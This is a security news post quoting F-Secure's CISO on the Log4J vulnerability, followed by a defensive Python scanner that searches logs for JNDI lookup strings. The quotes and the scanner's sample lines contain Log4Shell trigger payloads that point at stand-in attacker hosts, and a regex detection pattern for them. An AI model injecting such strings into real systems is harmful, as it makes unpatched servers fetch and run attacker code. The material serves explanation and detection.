F-Secure research blog and comment on Log4J vulnerability
December 2021 by Erka Koivunen, F-Secure’s Chief Information Security Officer
Following the news of the Log4J vulnerability, F-Secure has released a blog with research and notes on the issue.
A vulnerability in the Log4J library identified on Friday, December 10th is rocking software vendors and service providers around the globe. The weakness in the standardized method of handling log messages within software ranging from Microsoft’s Minecraft to ecommerce platforms is already under assault by attackers.
Erka Koivunen, F-Secure’s Chief Information Security Officer, comments on the incident:
“It’s a design failure of catastrophic proportions. All an attacker has to do to exploit the flaw is strategically send a malicious code string that eventually gets logged by Log4j. In the simplest terms, it allows an attacker to cause the target system to fetch and run code from a remote location controlled by the attacker. The second stage - what the downloaded malicious code does next - is fully up to the attacker.”
“Please don’t change your Tesla or iPhone name into $jndi:ldap://url/a unless you want unexpected user experience,” he says, half-jokingly.
“Using Log4J’s formatting language could trigger code in vulnerable applications around the globe. Just the mention of a phrase like ‘$jndi:ldap://attacker.com/pwnyourserver’ in a Minecraft chat, for instance, could set off a security firestorm at Microsoft in an unpatched system.”
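The comments above describe the trigger: an attacker-supplied string containing a JNDI lookup reaches Log4J and the library resolves it against a remote server. From a defender's side, the first practical step is to find such strings in the logs an application has already written. The scanner below is an added example written for this page, not code from F-Secure or the Log4J project. It assumes the lookup takes the form "${jndi:<scheme>://<host>/<path>}" as quoted in the post; the scheme list (ldap, ldaps, rmi, dns) and the sample log lines are constructed for the example and are not a complete list of what Log4J can resolve.

```python
import re
from typing import Dict, List

# Constructed sample lines, not real traffic: a benign web request, a request
# carrying the lookup string in its User-Agent header, a benign chat line and a
# chat line carrying the lookup (hosts use reserved example/documentation ranges).
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Dec/2021:14:02:11 +0000] "GET /index.html HTTP/1.1" 200 "Mozilla/5.0"',
    '10.0.0.9 - - [10/Dec/2021:14:02:15 +0000] "GET / HTTP/1.1" 200 "${jndi:ldap://attacker.example/a}"',
    "[chat] <player1> hello everyone",
    "[chat] <player2> ${JNDI:rmi://198.51.100.7:1099/obj}",
]

# The lookup form the post quotes: ${jndi:<scheme>://<target>}.
# Scheme list is an assumption for this example (the post names only LDAP).
# IGNORECASE because Log4J matches the lookup name case-insensitively.
JNDI_RE = re.compile(
    r"\$\{\s*jndi\s*:\s*(?P<scheme>ldaps?|rmi|dns)\s*://(?P<target>[^}\s]*)\}",
    re.IGNORECASE,
)


def find_jndi_lookups(line: str) -> List[Dict[str, str]]:
    """Return every JNDI lookup found in one log line.

    Each hit records the scheme, the remote target (host[:port]/path) that the
    vulnerable application would have contacted, and the raw matched text.
    """
    return [
        {
            "scheme": m.group("scheme").lower(),
            "target": m.group("target"),
            "raw": m.group(0),
        }
        for m in JNDI_RE.finditer(line)
    ]


def scan_log(lines: List[str]) -> List[Dict[str, object]]:
    """Scan a sequence of log lines and return all hits with their line numbers."""
    hits: List[Dict[str, object]] = []
    for number, line in enumerate(lines, start=1):
        for hit in find_jndi_lookups(line):
            hit["line"] = number
            hits.append(hit)
    return hits


def remote_targets(lines: List[str]) -> List[str]:
    """Distinct remote targets referenced by lookups, in first-seen order.

    Useful as a block list for egress filtering and for checking whether the
    application actually connected out to any of them.
    """
    seen: List[str] = []
    for hit in scan_log(lines):
        target = str(hit["target"])
        if target not in seen:
            seen.append(target)
    return seen


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(f"line {hit['line']}: {hit['scheme']} lookup to {hit['target']}")
    print("targets to review:", remote_targets(SAMPLE_LOG))
```

Running the block against the constructed lines reports the lookup in the User-Agent header (line 2) and the one in the chat message (line 4), and lists the two remote targets. Because the pattern is anchored on the literal "${jndi:" form, it catches only the plain form the post quotes; it is a starting point for triage, not a substitute for patching the library.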